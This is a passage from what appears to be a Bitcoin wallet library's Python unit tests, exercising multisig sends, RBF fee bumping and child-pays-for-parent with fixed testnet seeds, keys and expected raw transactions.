tx = wallet1a.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx = Transaction(tx.serialize()) # simulates moving partial txn between cosigners
self.assertFalse(tx.is_complete())
wallet1b.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet1a.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet1a.is_mine(wallet1a.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('01000000017120d4e1f2cdfe7df000d632cff74167fb354f0546d5cfc228e5c98756d55cb201000000fdfe0000483045022100f9ce5616683e613ae14b98d56436454b003348a8172e2ed598018e3d206e57d7022030c65c6551e839f9e9409812be624dbb4e36bd4152c9ed9b0988c10fd8201d1401483045022100d5cb94d4d1dcf01bb9e9280e8178a7e9ada3ad14378ca543afcc9f5667b27cb2022018e76b74800a21934e73b226b34cbbe45c877fba64693da8a20d3cb330f2eafd014c69522102afb4af9a91264e1c6dce3ebe5312801723270ac0ba8134b7b49129328fcb0f2821030b482838721a38d94847699fed8818b5c5f56500ef72f13489e365b65e5749cf2103e5db7969ae2f2576e6a061bf3bb2db16571e77ffb41e0b27170734359235cbce53aefeffffff0250a50500000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac2862b1000000000017a9142e517854aa54668128c0e9a3fdd4dec13ad571368700000000',
str(tx_copy))
self.assertEqual('26f3bdd0402e1cff19126244ebe3d32722cef0db507c7229ca8754f5e06ef25d', tx_copy.txid())
self.assertEqual('26f3bdd0402e1cff19126244ebe3d32722cef0db507c7229ca8754f5e06ef25d', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet2 -> wallet1
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet1a.get_receiving_address(), 100000)]
tx = wallet2.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet2.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet2.is_mine(wallet2.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('01000000015df26ee0f55487ca29727c50dbf0ce2227d3e3eb44621219ff1c2e40d0bdf326000000008b483045022100bd9f61ba82507d3a28922fb8be129e14699dfa54ddd03cc9494f696d38ac4121022071afca6fad5bc5c09b0a675e6444be3e97dbbdbc283764ee5f4e27a032d933d80141045f7ba332df2a7b4f5d13f246e307c9174cfa9b8b05f3b83410a3c23ef8958d610be285963d67c7bc1feb082f168fa9877c25999963ff8b56b242a852b23e25edfeffffff02a08601000000000017a91480c2353f6a7bc3c71e99e062655b19adb3dd2e4887280b0400000000001976a914ca14915184a2662b5d1505ce7142c8ca066c70e288ac00000000',
str(tx_copy))
self.assertEqual('c573b3f8464a4ed40dfc79d0889a780f44e917beef7a75883b2427c2987f3e95', tx_copy.txid())
self.assertEqual('c573b3f8464a4ed40dfc79d0889a780f44e917beef7a75883b2427c2987f3e95', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet level checks
self.assertEqual((0, funding_output_value - 370000 - 5000 + 100000, 0), wallet1a.get_balance())
self.assertEqual((0, 370000 - 5000 - 100000, 0), wallet2.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_between_p2wsh_2of3_and_p2wsh_p2sh_2of2(self, mock_write):
wallet1a = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('bitter grass shiver impose acquire brush forget axis eager alone wine silver', '', True),
keystore.from_xpub('Vpub5fcdcgEwTJmbmqAktuK8Kyq92fMf7sWkcP6oqAii2tG47dNbfkGEGUbfS9NuZaRywLkHE6EmUksrqo32ZL3ouLN1HTar6oRiHpDzKMAF1tf'),
keystore.from_xpub('Vpub5fjkKyYnvSS4wBuakWTkNvZDaBM2vQ1MeXWq368VJHNr2eT8efqhpmZ6UUkb7s2dwCXv2Vuggjdhk4vZVyiAQTwUftvff73XcUGq2NQmWra')
],
'2of3', gap_limit=2
)
wallet1b = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('snow nest raise royal more walk demise rotate smooth spirit canyon gun', '', True),
keystore.from_xpub('Vpub5fjkKyYnvSS4wBuakWTkNvZDaBM2vQ1MeXWq368VJHNr2eT8efqhpmZ6UUkb7s2dwCXv2Vuggjdhk4vZVyiAQTwUftvff73XcUGq2NQmWra'),
keystore.from_xpub('Vpub5gSKXzxK7FeKQedu2q1z9oJWxqvX72AArW3HSWpEhc8othDH8xMDu28gr7gf17sp492BuJod8Tn7anjvJrKpETwqnQqX7CS8fcYyUtedEMk')
],
'2of3', gap_limit=2
)
# ^ third seed: hedgehog sunset update estate number jungle amount piano friend donate upper wool
wallet2a = WalletIntegrityHelper.create_multisig_wallet(
[
# bip39: finish seminar arrange erosion sunny coil insane together pretty lunch lunch rose, der: m/1234'/1'/0', p2wsh-p2sh multisig
keystore.from_xprv('Uprv9CvELvByqm8k2dpecJVjgLMX1z5DufEjY4fBC5YvdGF5WjGCa7GVJJ2fYni1tyuF7Hw83E6W2ZBjAhaFLZv2ri3rEsubkCd5avg4EHKoDBN'),
keystore.from_xpub('Upub5Qb8ik4Cnu8g97KLXKgVXHqY6tH8emQvqtBncjSKsyfTZuorPtTZgX7ovKKZHuuVGBVd1MTTBkWez1XXt2weN1sWBz6SfgRPQYEkNgz81QF')
],
'2of2', gap_limit=2
)
wallet2b = WalletIntegrityHelper.create_multisig_wallet(
[
# bip39: square page wood spy oil story rebel give milk screen slide shuffle, der: m/1234'/1'/0', p2wsh-p2sh multisig
keystore.from_xprv('Uprv9BbnKEXJxXaNvdEsRJ9VA9toYrSeFJh5UfGBpM2iKe8Uh7UhrM9K8ioL53s8gvCoGfirHHaqpABDAE7VUNw8LNU1DMJKVoWyeNKu9XcDC19'),
keystore.from_xpub('Upub5RuakRisg8h3F7u7iL2k3UJFa1uiK7xauHamzTxYBbn4PXbM7eajr6M9Q2VCr6cVGhfhqWQqxnABvtSATuVM1xzxk4nA189jJwzaMn1QX7V')
],
'2of2', gap_limit=2
)
# bootstrap wallet1
funding_tx = Transaction('01000000000101a41aae475d026c9255200082c7fad26dc47771275b0afba238dccda98a597bd20000000000fdffffff02400d0300000000002200203c43ac80d6e3015cf378bf6bac0c22456723d6050bef324ec641e7762440c63c9dcd410000000000160014824626055515f3ed1d2cfc9152d2e70685c71e8f02483045022100b9f39fad57d07ce1e18251424034f21f10f20e59931041b5167ae343ce973cf602200fefb727fa0ffd25b353f1bcdae2395898fe407b692c62f5885afbf52fa06f5701210301a28f68511ace43114b674371257bb599fd2c686c4b19544870b1799c954b40e9c11300')
funding_txid = funding_tx.txid()
funding_output_value = 200000
self.assertEqual('d2bd6c9d332db8e2c50aa521cd50f963fba214645aab2f7556e061a412103e21', funding_txid)
wallet1a.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# wallet1 -> wallet2
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet2a.get_receiving_address(), 165000)]
tx = wallet1a.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
txid = tx.txid()
tx = Transaction(tx.serialize()) # simulates moving partial txn between cosigners
self.assertEqual(txid, tx.txid())
self.assertFalse(tx.is_complete())
wallet1b.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet1a.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet1a.is_mine(wallet1a.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('01000000000101213e1012a461e056752fab5a6414a2fb63f950cd21a50ac5e2b82d339d6cbdd20000000000feffffff023075000000000000220020cc5e4cc05a76d0648cd0742768556317e9f8cc729aed077134287909035dba88888402000000000017a914187842cea9c15989a51ce7ca889a08b824bf8743870400483045022100ea2fbd3d8681cfafdcae1bdaaa64f92fb9872fb8f6bf03a2b7effcf7390b66c8022021a79eff7975479934f958f3766d6ac61d708c79b785e398b3bcd84b1039e9b501483045022100dbc4f1ec18f0e0deb4ff88d7d5b3d3b7b500a80d0c0f33efbd3262f0c8689095022074fd226c0b52e3716ad907d14cba9c79aca482a8f4a51662ca83a5b9db49e15b016952210223f815ab09f6bfc8519165c5232947ae89d9d43d678fb3486f3b28382a2371fa210273c529c2c9a99592f2066cebc2172a48991af2b471cb726b9df78c6497ce984e2102aa8fc578b445a1e4257be6b978fcece92980def98dce0e1eb89e7364635ae94153ae00000000',
str(tx_copy))
self.assertEqual('6e9c3cd8788bdb970a124ea06136d52bc01cec4f9b1e217627d5e90ebe77d049', tx_copy.txid())
self.assertEqual('c58650fb77d04577fccb3e201deecbf691ab52ffb61cd2e57996c4d51f7e980b', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual(txid, tx_copy.txid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet2 -> wallet1
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet1a.get_receiving_address(), 100000)]
tx = wallet2a.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
txid = tx.txid()
tx = Transaction(tx.serialize()) # simulates moving partial txn between cosigners
self.assertEqual(txid, tx.txid())
self.assertFalse(tx.is_complete())
wallet2b.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet2a.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet2a.is_mine(wallet2a.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('0100000000010149d077be0ee9d52776211e9b4fec1cc02bd53661a04e120a97db8b78d83c9c6e01000000232200204311edae835c7a5aa712c8ca644180f13a3b2f3b420fa879b181474724d6163cfeffffff0260ea00000000000017a9143025051b6b5ccd4baf30dfe2de8aa84f0dd567ed87a0860100000000002200203c43ac80d6e3015cf378bf6bac0c22456723d6050bef324ec641e7762440c63c0400483045022100c254468bbe6b8bd1c8c01b6a223e46cc5c6b56fbba87d59575385ad249133b0e02207139688f8d6ae8076c92a266d98454d25c040d04c8e513a37bf7c32dad3e48210147304402204af5edbab2d674f6a9edef8c97b2f7fdf8ababedc7b287710cc7a64d4699358b022064e2d07f4bb32373be31b2003dc56b7b831a7c01419326efb3011c64b898b3f00147522102119f899075a131d4d519d4cdcf5de5907dc2df3b93d54b53ded852211d2b6cb12102fdb0f6775d4b6619257c43343ba5e7807b0164f1eb3f00f2b594ab9e53ab812652ae00000000',
str(tx_copy))
self.assertEqual('84b0dcb43022385f7a10e2710e5625a2be3cd6e390387b6100b55500d5eea8f6', tx_copy.txid())
self.assertEqual('7e561e25da843326e61fd20a40b72fcaeb8690176fc7c3fcbadb3a0146c8396c', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual(txid, tx_copy.txid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet level checks
self.assertEqual((0, funding_output_value - 165000 - 5000 + 100000, 0), wallet1a.get_balance())
self.assertEqual((0, 165000 - 5000 - 100000, 0), wallet2a.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_between_p2sh_1of2_and_p2wpkh_p2sh(self, mock_write):
wallet1a = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('phone guilt ancient scan defy gasp off rotate approve ill word exchange', '', True),
keystore.from_xpub('tpubD6NzVbkrYhZ4YPZ3ntVjqSCxiUUv2jikrUBU73Q3iJ7Y8iR41oYf991L5fanv7ciHjbjokdK2bjYqg1BzEUDxucU9qM5WRdBiY738wmgLP4')
],
'1of2', gap_limit=2
)
# ^ second seed: kingdom now gift initial age right velvet exotic harbor enforce kingdom kick
wallet2 = WalletIntegrityHelper.create_standard_wallet(
# bip39: uniform tank success logic lesson awesome stove elegant regular desert drip device, der: m/49'/1'/0'
keystore.from_xprv('uprv91HGbrNZTK4x8u22nbdYGzEuWPxjaHMREUi7CNhY64KsG5ZGnVM99uCa16EMSfrnaPTFxjbRdBZ2WiBkokoM8anzAy3Vpc52o88WPkitnxi'),
gap_limit=2
)
# bootstrap wallet1
funding_tx = Transaction('010000000001027e20990282eb29588375ad04936e1e991af3bc5b9c6f1ab62eca8c25becaef6a01000000171600140e6a17fadc8bafba830f3467a889f6b211d69a00fdffffff51847fd6bcbdfd1d1ea2c2d95c2d8de1e34c5f2bd9493e88a96a4e229f564e800100000017160014ecdf9fa06856f9643b1a73144bc76c24c67774a6fdffffff021e8501000000000017a91451991bfa68fbcb1e28aa0b1e060b7d24003352e38700093d000000000017a914b0b9f31bace76cdfae2c14abc03e223403d7dc4b870247304402205e19721b92c6afd70cd932acb50815a36ee32ab46a934147d62f02c13aeacf4702207289c4a4131ef86e27058ff70b6cb6bf0e8e81c6cbab6dddd7b0a9bc732960e4012103fe504411c21f7663caa0bbf28931f03fae7e0def7bc54851e0194dfb1e2c85ef02483045022100e969b65096fba4f8b24eb5bc622d2282076241621f3efe922cc2067f7a8a6be702203ec4047dd2a71b9c83eb6a0875a6d66b4d65864637576c06ed029d3d1a8654b0012102bbc8100dca67ba0297aba51296a4184d714204a5fc2eda34708360f37019a3dccfcc1300')
funding_txid = funding_tx.txid()
funding_output_value = 4000000
self.assertEqual('1137c12de4ce0f5b08de8846ba14c0814351a7f0f31457c8ea51a5d4b3c891a3', funding_txid)
wallet1a.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# wallet1 -> wallet2
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet2.get_receiving_address(), 1000000)]
tx = wallet1a.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet1a.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet1a.is_mine(wallet1a.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('0100000001a391c8b3d4a551eac85714f3f0a7514381c014ba4688de085b0fcee42dc13711010000009200483045022100fcf03aeb97b66791372c18aa0dd651817cf458d941dd628c966f0305a023360f022016c534530e267b6a52f90e62aa9fb50ace609ffb21e472d3ba7b29db9b30050e014751210245c90e040d4f9d1fc136b3d4d6b7535bbb5df2bd27666c21977042cc1e05b5b02103c9a6bebfce6294488315e58137a279b2efe09f1f528ecf93b40675ded3cf0e5f52aefeffffff0240420f000000000017a9149573eb50f3136dff141ac304190f41c8becc92ce8738b32d000000000017a914b815d1b430ae9b632e3834ed537f7956325ee2a98700000000',
str(tx_copy))
self.assertEqual('1b7e94860b9681d4e371928d40fdbd4641e991aa74f1a211f239c887047e4a2a', tx_copy.txid())
self.assertEqual('1b7e94860b9681d4e371928d40fdbd4641e991aa74f1a211f239c887047e4a2a', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet2 -> wallet1
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet1a.get_receiving_address(), 300000)]
tx = wallet2.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet2.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet2.is_mine(wallet2.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('010000000001012a4a7e0487c839f211a2f174aa91e94146bdfd408d9271e3d481960b86947e1b00000000171600149fad840ed174584ee054bd26f3e411817338c5edfeffffff02e09304000000000017a914b0b9f31bace76cdfae2c14abc03e223403d7dc4b87d89a0a000000000017a9148ccd0efb2be5b412c4033715f560ed8f446c8ceb87024830450221009c816c3e0c40b37085244f0976f65635b8d711952bad9843c5f51e386fd37cc402202c34a4a7227182742d9f93e9f28c4bd30ded6514550f39614cb5ad00e46690070121038362bbf0b4918b37e9d7c75930ed3a78e3d445724cb5c37ade4a59b6e411fe4e00000000',
str(tx_copy))
self.assertEqual('f65edb0843ff44436dc5964fb6b298e157502b9b4a83dac6b82dd2d2a3247d0a', tx_copy.txid())
self.assertEqual('63efc09db4c7445eaaca9a5e7732202f42aec81a53b05d819f1918ce0cf3b84d', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet level checks
self.assertEqual((0, funding_output_value - 1000000 - 5000 + 300000, 0), wallet1a.get_balance())
self.assertEqual((0, 1000000 - 5000 - 300000, 0), wallet2.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bump_fee_p2pkh(self, mock_write):
wallet = self.create_standard_wallet_from_seed('fold object utility erase deputy output stadium feed stereo usage modify bean')
# bootstrap wallet
funding_tx = Transaction('010000000001011f4db0ecd81f4388db316bc16efb4e9daf874cf4950d54ecb4c0fb372433d68500000000171600143d57fd9e88ef0e70cddb0d8b75ef86698cab0d44fdffffff0280969800000000001976a91472e34cebab371967b038ce41d0e8fa1fb983795e88ac86a0ae020000000017a9149188bc82bdcae077060ebb4f02201b73c806edc887024830450221008e0725d531bd7dee4d8d38a0f921d7b1213e5b16c05312a80464ecc2b649598d0220596d309cf66d5f47cb3df558dbb43c5023a7796a80f5a88b023287e45a4db6b9012102c34d61ceafa8c216f01e05707672354f8119334610f7933a3f80dd7fb6290296bd391400')
funding_txid = funding_tx.txid()
funding_output_value = 10000000
self.assertEqual('03052739fcfa2ead5f8e57e26021b0c2c546bcd3d74c6e708d5046dc58d90762', funding_txid)
wallet.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, '2N1VTMMFb91SH9SNRAkT7z8otP5eZEct4KL', 2500000)]
coins = wallet.get_spendable_coins(domain=None, config=self.config)
tx = wallet.make_unsigned_transaction(coins, outputs, config=self.config, fixed_fee=5000)
tx.set_rbf(True)
tx.locktime = 1325501
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet.is_mine(wallet.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual('01000000016207d958dc46508d706e4cd7d3bc46c5c2b02160e2578e5fad2efafc39270503000000006b483045022100df74e6a88085be1ff3a3fd96cf2ef03b5e33fa06788f56aa71649f0177d1bfc402206e36a7e6124863ac746d5288d6d47c1d1eac5d4ac3818e561a7a0f2c0a269429012102a807c07bd7975211078e916bdda061d97e98d59a3631a804aada2f9a3f5b587afdffffff02a02526000000000017a9145a71fc1a7a98ddd67be935ade1600981c0d066f987585d7200000000001976a914aab9af3fbee0ab4e5c00d53e92f66d4bcb44f1bd88acbd391400',
str(tx_copy))
self.assertEqual('44e6dd9529a253181112fc40cadd8ebb4c4359aacb91aa24c45556a1d00839b0', tx_copy.txid())
self.assertEqual('44e6dd9529a253181112fc40cadd8ebb4c4359aacb91aa24c45556a1d00839b0', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 2500000 - 5000, 0), wallet.get_balance())
# bump tx
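        # RBF fee bump: build a replacement that spends the same input but pays
        # `delta` more fee, taken from the change output; the replacement is
        # unsigned at first and must be re-signed before it is complete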
tx = wallet.bump_fee(tx=Transaction(tx.serialize()), delta=5000)
tx.locktime = 1325501
self.assertFalse(tx.is_complete())
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
tx_copy = Transaction(tx.serialize())
self.assertEqual('01000000016207d958dc46508d706e4cd7d3bc46c5c2b02160e2578e5fad2efafc39270503000000006a473044022055b7e6b7e89a55740f7aa2ad1ffcd4b5c913f0de63cf512438921534bc9c3a8d022043b3b27bdc2da4cc6265e4cc9673a3780ccd5cd6f0ee2eaedb51720c15b7a00a012102a807c07bd7975211078e916bdda061d97e98d59a3631a804aada2f9a3f5b587afdffffff02a02526000000000017a9145a71fc1a7a98ddd67be935ade1600981c0d066f987d0497200000000001976a914aab9af3fbee0ab4e5c00d53e92f66d4bcb44f1bd88acbd391400',
str(tx_copy))
self.assertEqual('f26edcf20991dccedf16058adbee923db7057c9b102db660156b8142b6a59bc7', tx_copy.txid())
self.assertEqual('f26edcf20991dccedf16058adbee923db7057c9b102db660156b8142b6a59bc7', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 2500000 - 10000, 0), wallet.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_cpfp_p2pkh(self, mock_write):
wallet = self.create_standard_wallet_from_seed('fold object utility erase deputy output stadium feed stereo usage modify bean')
# bootstrap wallet
funding_tx = Transaction('010000000001010f40064d66d766144e17bb3276d96042fd5aee2196bcce7e415f839e55a83de800000000171600147b6d7c7763b9185b95f367cf28e4dc6d09441e73fdffffff02404b4c00000000001976a9141df43441a3a3ee563e560d3ddc7e07cc9f9c3cdb88ac009871000000000017a9143873281796131b1996d2f94ab265327ee5e9d6e28702473044022029c124e5a1e2c6fa12e45ccdbdddb45fec53f33b982389455b110fdb3fe4173102203b3b7656bca07e4eae3554900aa66200f46fec0af10e83daaa51d9e4e62a26f4012103c8f0460c245c954ef563df3b1743ea23b965f98b120497ac53bd6b8e8e9e0f9bbe391400')
funding_txid = funding_tx.txid()
funding_output_value = 5000000
self.assertEqual('9973bf8918afa349b63934432386f585613b51034db6c8628b61ba2feb8a3668', funding_txid)
wallet.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# cpfp tx
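        # child-pays-for-parent: spend the unconfirmed funding output back to
        # ourselves, attaching a fee large enough to make the pair attractive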
tx = wallet.cpfp(funding_tx, fee=50000)
tx.set_rbf(True)
tx.locktime = 1325502
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertEqual(tx.txid(), tx_copy.txid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual('010000000168368aeb2fba618b62c8b64d03513b6185f58623433439b649a3af1889bf7399000000006a47304402203a0b369e46c5fbacb83044b7ab9d69ff7998774041d6870993504915bc495d210220272833b870d8abca516adb7dc4cb27892b1b6e4b52fbfeb592a72c3e795eb213012102a7536f0bfbc60c5a8e86e2b9df26431fc062f9f454016dbc26f2467e0bc98b3ffdffffff01f0874b00000000001976a9141df43441a3a3ee563e560d3ddc7e07cc9f9c3cdb88acbe391400',
str(tx_copy))
self.assertEqual('47500a425518b5542d94db1157f473b8cf322d31ea97a1a642fec19386cdb761', tx_copy.txid())
self.assertEqual('47500a425518b5542d94db1157f473b8cf322d31ea97a1a642fec19386cdb761', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 50000, 0), wallet.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bump_fee_p2wpkh(self, mock_write):
wallet = self.create_standard_wallet_from_seed('frost repair depend effort salon ring foam oak cancel receive save usage')
# bootstrap wallet
funding_tx = Transaction('01000000000102acd6459dec7c3c51048eb112630da756f5d4cb4752b8d39aa325407ae0885cba020000001716001455c7f5e0631d8e6f5f05dddb9f676cec48845532fdffffffd146691ef6a207b682b13da5f2388b1f0d2a2022c8cfb8dc27b65434ec9ec8f701000000171600147b3be8a7ceaf15f57d7df2a3d216bc3c259e3225fdffffff02a9875b000000000017a914ea5a99f83e71d1c1dfc5d0370e9755567fe4a141878096980000000000160014d4ca56fcbad98fb4dcafdc573a75d6a6fffb09b702483045022100dde1ba0c9a2862a65791b8d91295a6603207fb79635935a67890506c214dd96d022046c6616642ef5971103c1db07ac014e63fa3b0e15c5729eacdd3e77fcb7d2086012103a72410f185401bb5b10aaa30989c272b554dc6d53bda6da85a76f662723421af024730440220033d0be8f74e782fbcec2b396647c7715d2356076b442423f23552b617062312022063c95cafdc6d52ccf55c8ee0f9ceb0f57afb41ea9076eb74fe633f59c50c6377012103b96a4954d834fbcfb2bbf8cf7de7dc2b28bc3d661c1557d1fd1db1bfc123a94abb391400')
funding_txid = funding_tx.txid()
funding_output_value = 10000000
self.assertEqual('52e669a20a26c8b3df5b41e5e6309b18bcde8e1ad7ea17a18f63b6dc6c8becc0', funding_txid)
wallet.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, '2N1VTMMFb91SH9SNRAkT7z8otP5eZEct4KL', 2500000)]
coins = wallet.get_spendable_coins(domain=None, config=self.config)
tx = wallet.make_unsigned_transaction(coins, outputs, config=self.config, fixed_fee=5000)
tx.set_rbf(True)
tx.locktime = 1325499
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet.is_mine(wallet.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual('01000000000101c0ec8b6cdcb6638fa117ead71a8edebc189b30e6e5415bdfb3c8260aa269e6520100000000fdffffff02a02526000000000017a9145a71fc1a7a98ddd67be935ade1600981c0d066f987585d720000000000160014f0fe5c1867a174a12e70165e728a072619455ed50247304402205442705e988abe74bf391b293bb1b886674284a92ed0788c33024f9336d60aef022013a93049d3bed693254cd31a704d70bb988a36750f0b74d0a5b4d9e29c54ca9d0121028d4c44ca36d2c4bff3813df8d5d3c0278357521ecb892cd694c473c03970e4c5bb391400',
str(tx_copy))
self.assertEqual('b019bbad45a46ed25365e46e4cae6428fb12ae425977eb93011ffb294cb4977e', tx_copy.txid())
self.assertEqual('ba87313e2b3b42f1cc478843d4d53c72d6e06f6c66ac8cfbe2a59cdac2fd532d', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 2500000 - 5000, 0), wallet.get_balance())
# bump tx
tx = wallet.bump_fee(tx=Transaction(tx.serialize()), delta=5000)
tx.locktime = 1325500
self.assertFalse(tx.is_complete())
wallet.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
tx_copy = Transaction(tx.serialize())
self.assertEqual('01000000000101c0ec8b6cdcb6638fa117ead71a8edebc189b30e6e5415bdfb3c8260aa269e6520100000000fdffffff02a02526000000000017a9145a71fc1a7a98ddd67be935ade1600981c0d066f987d049720000000000160014f0fe5c1867a174a12e70165e728a072619455ed5024730440220517fed3a902b5b41fa718ffd5f229b835b8ed26f23433c4ea437d24eff66d15b0220526854a6ebcd351ab2373d0e7c4e20f17c420520b5d570c2df7ca1d773d6a55d0121028d4c44ca36d2c4bff3813df8d5d3c0278357521ecb892cd694c473c03970e4c5bc391400',
str(tx_copy))
self.assertEqual('9a1c0ef7e871798b86074c7f8dd1e81b6d9a758ff07e0059eee31dc6fbf4f438', tx_copy.txid())
self.assertEqual('59144d30c911ac33359b0a32d5a3fdd2ca806982c85838e193eb95f5d315e813', tx_copy.wtxid())
wallet.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual((0, funding_output_value - 2500000 - 10000, 0), wallet.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_cpfp_p2wpkh(self, mock_write):
wallet = self.create_standard_wallet_from_seed('frost repair depend effort salon ring foam oak cancel receive save usage')
# bootstrap wallet
